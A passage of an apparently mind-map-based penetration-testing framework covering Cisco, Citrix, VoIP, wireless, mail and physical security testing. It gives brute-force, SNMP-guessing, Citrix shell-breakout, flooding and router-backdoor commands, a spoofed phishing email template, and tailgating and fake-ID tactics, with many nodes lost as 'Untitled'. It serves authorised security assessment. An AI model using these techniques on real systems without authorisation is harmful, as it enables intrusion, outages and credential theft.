17.1.3. Exploitation CVE References CVE-2005-1244 - Severity : High - CVSS : 7.0 CVE-2005-1243 - Severity : Low - CVSS : 3.3 CVE-2005-1242 - Severity : Low - CVSS : 3.3 CVE-2005-1241 - Severity : High - CVSS : 7.0 CVE-2005-1240 - Severity : High - CVSS : 7.0 CVE-2005-1239 - Severity : Low - CVSS : 3.3 CVE-2005-1238 - Severity : High - CVSS : 9.0 CVE-2005-1182 - Severity : Low - CVSS : 3.3 CVE-2005-1133 - Severity : Low - CVSS : 3.3 CVE-2005-1025 - Severity : Low - CVSS : 3.3 CVE-2005-0868 - Severity : High - CVSS : 7.0 CVE-2005-0899 - Severity : Low - CVSS : 2.3 CVE-2002-1822 - Severity : Low - CVSS : 3.3 CVE-2002-1731 - Severity : Low - CVSS : 2.3 CVE-2000-1038 - Severity : Low - CVSS : 3.3 CVE-1999-1279 - Severity : Low - CVSS : 3.3 CVE-1999-1012 - Severity : Low - CVSS : 3.3 Access with Work Station Gateway http://target:5061/WSG Default AS/400 accounts. Network attacks (next release) DB2 QSHELL Hijacking Terminals Trojan attacks Hacking from AS/400

17.2. Local

17.2.1. System Value Security Untitled Untitled Untitled Untitled Untitled Untitled Untitled Recommended value is 30

17.2.2. Password Policy Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled

17.2.3. Audit level Untitled Recommended value is *SECURITY

17.2.4. Documentation Users class Untitled System Audit Settings Untitled Special Authorities Definitions Untitled

18. Bluetooth Specific Testing

18.1. Bluescanner

18.2. Bluesweep

18.3. btscanner

18.4. Redfang

18.5. Blueprint

18.6. Bluesnarfer

18.7. Bluebugger

18.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

18.8. Blueserial

18.9. Bloover

18.10. Bluesniff

18.11. Exploit Frameworks

18.11.1. BlueMaho Untitled

18.12. Resources

18.12.1. URL's Bluejackers bluetooth-pentest Trifinite

18.12.2. Vulnerability Information Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here:

18.12.3. White Papers Bluesnarfing

19. Cisco Specific Testing

19.1. Methodology

19.1.1. Scan & Fingerprint. Untitled Untitled If SNMP is active, then community string guessing should be performed.

19.1.2. Credentials Guessing. Untitled Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

19.1.3. Connect Untitled If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

19.1.4. Check for bugs Untitled The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

19.1.5. Further your attack Untitled running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network. Untitled #> access-list 100 permit ip <IP> any

19.2. Scan & Fingerprint.

19.2.1. Port Scanning nmap Untitled Other tools Untitled mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

19.2.2. Fingerprinting Untitled BT cisco-torch-0.4b # -A Untitled TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt Untitled

19.3. Password Guessing.

19.3.1. Untitled ./CAT  -h  <IP>  -a  password.wordlist Untitled

19.3.2. Untitled ./enabler <IP> [-u username] -p password /password.wordlist [port] Untitled

19.3.3. Untitled BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco Untitled

19.4. SNMP Attacks.

19.4.1. Untitled ./CAT  -h  <IP>  -w  SNMP.wordlist Untitled

19.4.2. Untitled onesixytone  -c  SNMP.wordlist  <IP> BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt Scanning 1 hosts, 64 communities [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

19.4.3. Untitled snmapwalk  -v  <Version>  -c  <Community string>  <IP> Untitled

19.5. Connecting.

19.5.1. Telnet Untitled  telnet  <IP> Sample Banners

19.5.2. SSH

19.5.3. Web Browser Untitled This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following: Authentication Required Enter username and password for "level_15_access" at User Name: Password: Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

19.5.4. TFTP Untitled Untitled ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names. Untitled ./ <options> <IP,hostname,network> ./ <options> -F <hostlist> Creating backdoors in Cisco IOS using TCL

19.6. Known Bugs.

19.6.1. Attack Tools Untitled Untitled Untitled Web browse to the Cisco device: http://<IP> Untitled Untitled Untitled Untitled ./ios-w3-vul fetch > /tmp/router.txt

19.6.2. Common Vulnerabilities and Exploits (CVE) Information Vulnerabilties and exploit information relating to these products can be found here:

19.7. Configuration Files.

19.7.1. Untitled Configuration files explained The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access. Untitled Untitled Password Encryption Utilised Untitled Configuration Testing Tools Nipper fwauto (Beta)

19.8. References.

19.8.1. Cisco IOS Exploitation Techniques

20. Citrix Specific Testing

20.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

20.2. Enumeration

20.2.1. web search Google (GHDB) ext:ica inurl:citrix/metaframexp/default/login.asp [WFClient] Password= filetype:ica inurl:citrix/metaframexp/default/login.asp? ClientDetection=On inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" inurl:/Citrix/Nfuse17/ inurl:Citrix/MetaFrame/default/default.aspx Google Hacks (Author Discovered) filetype:ica Username= inurl:Citrix/AccessPlatform/auth/login.aspx inurl:/Citrix/AccessPlatform/ inurl:LogonAgent/Login.asp inurl:/CITRIX/NFUSE/default/login.asp inurl:/Citrix/NFuse161/login.asp inurl:/Citrix/NFuse16 inurl:/Citrix/NFuse151/ allintitle:MetaFrame XP Login allintitle:MetaFrame Presentation Server Login inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On allintitle:Citrix(R) NFuse(TM) Classic Login Yahoo originurlextension:ica

20.2.2. site search Manual review web page for useful information review source for web page

20.2.3. generic nmap -A -PN -p 80,443,1494 ip_address amap -bqv ip_address port_no.

20.2.4. citrix specific perl ip_address enum.js enum.js apps TCPBrowserAdress=ip_address connect.js connect.js TCPBrowserAdress=ip_address Application=advertised-application Citrix-pa-scan perl ip_address [timeout] > pas.wri pabrute.c ./pabrute pubapp list app_list ip_address

20.2.5. Default Ports TCP Citrix XML Service Advanced Management Console Citrix SSL Relay ICA sessions Server to server Management Console to server Session Reliability (Auto-reconnect) License Management Console License server UDP Clients to ICA browser service Server-to-server

20.2.6. nmap nse scripts citrix-enum-apps nmap -sU --script=citrix-enum-apps -p 1604 <host> citrix-enum-apps-xml nmap --script=citrix-enum-apps-xml -p 80,443 <host> citrix-enum-servers nmap -sU --script=citrix-enum-servers -p 1604 citrix-enum-servers-xml nmap --script=citrix-enum-servers-xml -p 80,443 <host> citrix-brute-xml nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

20.3. Scanning

20.3.1. Nessus Plugins CGI abuses CGI abuses : Cross Site Scripting (XSS) Misc. Service Detection Web Servers Windows

20.3.2. Nikto perl -host ip_address -port port_no. Untitled

20.4. Exploitation

20.4.1. Alter default .ica files InitialProgram=cmd.exe InitialProgram=explorer.exe

20.4.2. Enumerate and Connect For applications identified by Citrix-pa-scan Pas For published applications with a Citrix client when the master browser is non-public. Citrix-pa-proxy

20.4.3. Manual Testing Create Batch File (cmd.bat) 1 2 Host Scripting File (cmd.vbs) Option Explicit Dim objShell objShell.Run "%comspec% /k" WScript.Quit alternative functionality iKat Integrated Kiosk Attack Tool AT Command - priviledge escalation AT HH:MM /interactive "cmd.exe" AT HH:MM /interactive %comspec% /k Untitled Keyboard Shortcuts/ Hotkeys Ctrl + h – View History Ctrl + n – New Browser Shift + Left Click – New Browser Ctrl + o – Internet Address (browse feature) Ctrl + p – Print (to file) Right Click (Shift + F10) F1 – Jump to URL SHIFT+F1: Local Task List SHIFT+F2: Toggle Title Bar SHIFT+F3: Close Remote Application CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del CTRL+F2: Remote Task List CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC ALT+F2: Cycle through programs ALT+PLUS: Alt+TAB ALT+MINUS: ALT+SHIFT+TAB

20.5. Brute Force

20.5.1. bforce.js bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2 bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt Untitled

20.6. Review Configuration Files

20.6.1. Application server configuration file appsrv.ini Location World writeable Review other files Sample file

20.6.2. Program Neighborhood configuration file pn.ini Location Review other files Sample file

20.6.3. Citrix ICA client configuration file wfclient.ini Location

20.7. References

20.7.1. Vulnerabilities Art of Hacking Common Vulnerabilities and Exploits (CVE) Sample file Untitled OSVDB[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia Secunia SecurityFocus

20.7.2. Support Citrix Knowledge Base Thinworld

20.7.3. Exploits Milw0rm Art of Hacking Citrix

20.7.4. Tools Resource Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

21. Network Backbone

21.1. Generic Toolset

21.1.1. Wireshark (Formerly Ethereal) Passive Sniffing Usernames/Passwords Email FTP HTTP HTTPS RDP VOIP Other Filters ip.src == ip_address ip.dst == ip_address tcp.dstport == port_no. ! ip.addr == ip_address (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

21.1.2. Cain & Abel Active Sniffing ARP Cache Poisoning DNS Poisoning Routing Protocols

21.1.3. Cisco-Torch ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>

21.1.4. NTP-Fingerprint perl -t [ip_address]

21.1.5. Yersinia

21.1.6. p0f ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

21.1.7. Manual Check (Credentials required)

21.1.8. MAC Spoofing mac address changer for windows macchanger Random Mac Address:- macchanger -r eth0 madmacs smac TMAC

22. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

22.1. Password Attacks

22.1.1. Known Accounts Identified Passwords Unidentified Hashes

22.1.2. Default Accounts Identified Passwords Unidentified Hashes

22.2. Exploits

22.2.1. Successful Exploits Accounts Passwords Groups Other Details Services Backdoor Connectivity

22.2.2. Unsuccessful Exploits

22.2.3. Resources Securiteam Exploits are sorted by year and must be downloaded individually SecurityForest Updated via CVS after initial install GovernmentSecurity Need to create and account to obtain access Red Base Security Oracle Exploit site only Wireless Vulnerabilities & Exploits (WVE) Wireless Exploit Site PacketStorm Security Exploits downloadable by month and year but no indexing carried out. SecWatch Exploits sorted by year and month, download seperately SecurityFocus Exploits must be downloaded individually Metasploit Install and regualrly update via svn Milw0rm Exploit archived indexed and sorted by port download as a whole - The one to go for!

22.3. Tools

22.3.1. Metasploit Free Extra Modules local copy

22.3.2. Manual SQL Injection Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheatsheets Untitled

22.3.3. SQL Power Injector

22.3.4. SecurityForest

22.3.5. SPI Dynamics WebInspect

22.3.6. Core Impact

22.3.7. Cisco Global Exploiter

22.3.8. PIXDos perl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

22.3.9. CANVAS

22.3.10. Inguma

23. Server Specific Tests

23.1. Databases

23.1.1. Direct Access Interrogation MS SQL Server Ports Version osql Oracle Ports TNS Listener SQL Plus Default Account/Passwords Default SID's MySQL Ports Version Users/Passwords DB2 Informix Sybase Other

23.1.2. Scans Default Ports Non-Default Ports Instance Names Versions

23.1.3. Password Attacks Sniffed Passwords Cracked Passwords Hashes Direct Access Guesses

23.1.4. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

23.2. Mail

23.2.1. Scans

23.2.2. Fingerprint Manual Automated

23.2.3. Spoofable Telnet spoof telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: []X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=></a>Online Security Manager.Target [email protected]

23.2.4. Relays

23.3. VPN

23.3.1. Scanning 500 UDP IPSEC 1723 TCP PPTP 443 TCP/SSL nmap -sU -PN -p 500 ipsecscan

23.3.2. Fingerprinting ike-scan --showbackoff

23.3.3. PSK Crack ikeprobe sniff for responses with C&A or ikecrack

23.4. Web

23.4.1. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

23.4.2. Permissions PUT /test.txt HTTP/1.0 CONNECT HTTP/1.0 POST HTTP/1.0Content-Type: text/plainContent-Length: 6

23.4.3. Scans

23.4.4. Fingerprinting Other HTTP Commands Modules File Extensions HTTPS Commands Commands File Extensions

23.4.5. Directory Traversal\

24. VoIP Security

24.1. Sniffing Tools

24.1.1. AuthTool

24.1.2. Cain & Abel

24.1.3. Etherpeek

24.1.4. NetDude

24.1.5. Oreka

24.1.6. PSIPDump

24.1.7. SIPomatic

24.1.8. SIPv6 Analyzer

24.1.9. UCSniff

24.1.10. VoiPong

24.1.11. VOMIT

24.1.12. Wireshark

24.1.13. WIST - Web Interface for SIP Trace

24.2. Scanning and Enumeration Tools

24.2.1. enumIAX

24.2.2. fping

24.2.3. IAX Enumerator

24.2.4. iWar

24.2.5. Nessus

24.2.6. Nmap

24.2.7. SIP Forum Test Framework (SFTF)

24.2.8. SIPcrack

24.2.9. sipflanker python 192.168.1-254

24.2.10. SIP-Scan

24.2.11. SIP.Tastic

24.2.12. SIPVicious

24.2.13. SiVuS

24.2.14. SMAP smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

24.2.15. snmpwalk

24.2.16. VLANping

24.2.17. VoIPAudit

24.2.18. VoIP GHDB Entries

24.2.19. VoIP Voicemail Database

24.3. Packet Creation and Flooding Tools

24.3.1. H.323 Injection Files

24.3.2. H225regreject

24.3.3. IAXHangup

24.3.4. IAXAuthJack

24.3.5. IAX.Brute

24.3.6. IAXFlooder ./iaxflood sourcename destinationname numpackets

24.3.7. INVITE Flooder ./inviteflood interface target_user target_domain ip_address_target no_of_packets

24.3.8. kphone-ddos

24.3.9. RTP Flooder

24.3.10. rtpbreak

24.3.11. Scapy

24.3.12. Seagull

24.3.13. SIPBomber

24.3.14. SIPNess

24.3.15. SIPp

24.3.16. SIPsak Tracing paths: - sipsak -T -s sip:[email protected] Options request:- sipsak -vv -s sip:[email protected] Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

24.3.17. SIP-Send-Fun

24.3.18. SIPVicious

24.3.19. Spitter

24.3.20. TFTP Brute Force perl <tftpserver> <filelist> <maxprocesses>

24.3.21. UDP Flooder ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

24.3.22. UDP Flooder (with VLAN Support) ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

24.3.23. Voiphopper

24.4. Fuzzing Tools

24.4.1. Asteroid

24.4.2. Codenomicon VoIP Fuzzers

24.4.3. Fuzzy Packet

24.4.4. Mu Security VoIP Fuzzing Platform

24.4.5. ohrwurm RTP Fuzzer

24.4.6. PROTOS H.323 Fuzzer

24.4.7. PROTOS SIP Fuzzer

24.4.8. SIP Forum Test Framework (SFTF)

24.4.9. Sip-Proxy

24.4.10. Spirent ThreatEx

24.5. Signaling Manipulation Tools

24.5.1. AuthTool ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

24.5.2. BYE Teardown

24.5.3. Check Sync Phone Rebooter

24.5.4. RedirectPoison ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:;line=xtrfgy>"

24.5.5. Registration Adder

24.5.6. Registration Eraser

24.5.7. Registration Hijacker

24.5.8. SIP-Kill

24.5.9. SIP-Proxy-Kill

24.5.10. SIP-RedirectRTP

24.5.11. SipRogue

24.5.12. vnak

24.6. Media Manipulation Tools

24.6.1. RTP InsertSound ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

24.6.2. RTP MixSound ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

24.6.3. RTPProxy

24.6.4. RTPInject

24.7. Generic Software Suites

24.7.1. OAT Office Communication Server Tool Assessment

24.7.2. EnableSecurity VOIPPACK Note: - Add-on for Immunity Canvas

24.8. References

24.8.1. URL's Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here: Default Passwords Hacking Exposed VoIP Tool Pre-requisites VoIPsa

24.8.2. White Papers An Analysis of Security Threats and Tools in SIP-Based VoIP Systems An Analysis of VoIP Security Threats and Tools Hacking VoIP Exposed Security testing of SIP implementations SIP Stack Fingerprinting and Stack Difference Attacks Two attacks against VoIP VoIP Attacks! VoIP Security Audit Program (VSAP)

25. Wireless Penetration

25.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

25.1.1. Site Map RF Map Lines of Sight Signal Coverage Physical Map Triangulate APs Satellite Imagery

25.1.2. Network Map MAC Filter Authorised MAC Addresses Reaction to Spoofed MAC Addresses Encryption Keys utilised WEP WPA/PSK 802.1x Access Points ESSID BSSIDs Wireless Clients MAC Addresses Intercepted Traffic

25.2. Wireless Toolkit

25.2.1. Wireless Discovery Aerosol Airfart Aphopper Apradar BAFFLE inSSIDer iWEPPro karma KisMAC-ng Kismet MiniStumbler Netstumbler Vistumbler Wellenreiter Wifi Hopper WirelessMon WiFiFoFum

25.2.2. Packet Capture Airopeek Airpcap Airtraf Apsniff Cain Commview Ettercap Netmon nmwifi Wireshark

25.2.3. EAP Attack tools eapmd5pass eapmd5pass -w dictionary_file -r eapmd5-capture.dump Untitled

25.2.4. Leap Attack Tools asleap thc leap cracker anwrap

25.2.5. WEP/ WPA Password Attack Tools Airbase Aircrack-ptw Aircrack-ng Airsnort cowpatty FiOS Wireless Key Calculator iWifiHack KisMAC-ng Rainbow Tables wep attack wep crack wzcook

25.2.6. Frame Generation Software Airgobbler airpwn Airsnarf Commview fake ap void 11 wifi tap wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h] FreeRADIUS - Wireless Pwnage Edition

25.2.7. Mapping Software Online Mapping WIGLE Skyhook Tools Knsgem

25.2.8. File Format Conversion Tools ns1 recovery and conversion tool warbable warkizniz warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename] ivstools

25.2.9. IDS Tools WIDZ War Scanner Snort-Wireless AirDefense AirMagnet

25.3. WLAN discovery

25.3.1. Unencrypted WLAN Visible SSID Sniff for IP range Hidden SSID Deauth client

25.3.2. WEP encrypted WLAN Visible SSID WEPattack Hidden SSID Deauth client

25.3.3. WPA / WPA2 encrypted WLAN Deauth client Capture EAPOL handshake

25.3.4. LEAP encrypted WLAN Deauth client Break LEAP

25.3.5. 802.1x WLAN Create Rogue Access Point Airsnarf fake ap Hotspotter Karma Linux rogue AP

25.3.6. Resources URL's Russix Wireless Vulnerabilities and Exploits (WVE) White Papers Weaknesses in the Key Scheduling Algorithm of RC4 802.11b Firmware-Level Attacks Wireless Attacks from an Intrusion Detection Perspective Implementing a Secure Wireless Network for a Windows Environment Breaking 104 bit WEP in less than 60 seconds PEAP Shmoocon2008 Wright & Antoniewicz Active behavioral fingerprinting of wireless devices Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here:

26. Physical Security

26.1. Building Security

26.1.1. Meeting Rooms Check for active network jacks. Check for any information in room.

26.1.2. Lobby Check for active network jacks. Does receptionist/guard leave lobby? Accessbile printers? Print test page. Obtain phone/personnel listing.

26.1.3. Communal Areas Check for active network jacks. Check for any information in room. Listen for employee conversations.

26.1.4. Room Security Resistance of lock to picking. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors? Ceiling access areas. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

26.1.5. Windows Check windows/doors for visible intruderalarm sensors. Check visible areas for sensitive information. Can you video users logging on?

26.2. Perimeter Security

26.2.1. Fence Security Attempt to verify that the whole of the perimeter fence is unbroken.

26.2.2. Exterior Doors If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

26.2.3. Guards Patrol Routines Analyse patrol timings to ascertain if any holes exist in the coverage. Communications Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

26.3. Entry Points

26.3.1. Guarded Doors Piggybacking Attempt to closely follow employees into thebuilding without having to show valid credentials. Fake ID Attempt to use fake ID to gain access. Access Methods Test 'out of hours' entry methods

26.3.2. Unguarded Doors Identify all unguardedentry points. Are doors secured? Check locks for resistance to lock picking.

26.3.3. Windows Check windows/doors for visible intruderalarm sensors. Attempt to bypass sensors.

26.4. Office Waste

26.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

27. Final Report - template

28. Contributors

28.1. Matt Byrne (

28.1.1. Matt contributed the majority of the Wireless section.

28.2. Arvind Doraiswamy (

28.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

28.3. Lee Lawson (

28.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

28.4. Nabil OUCHN (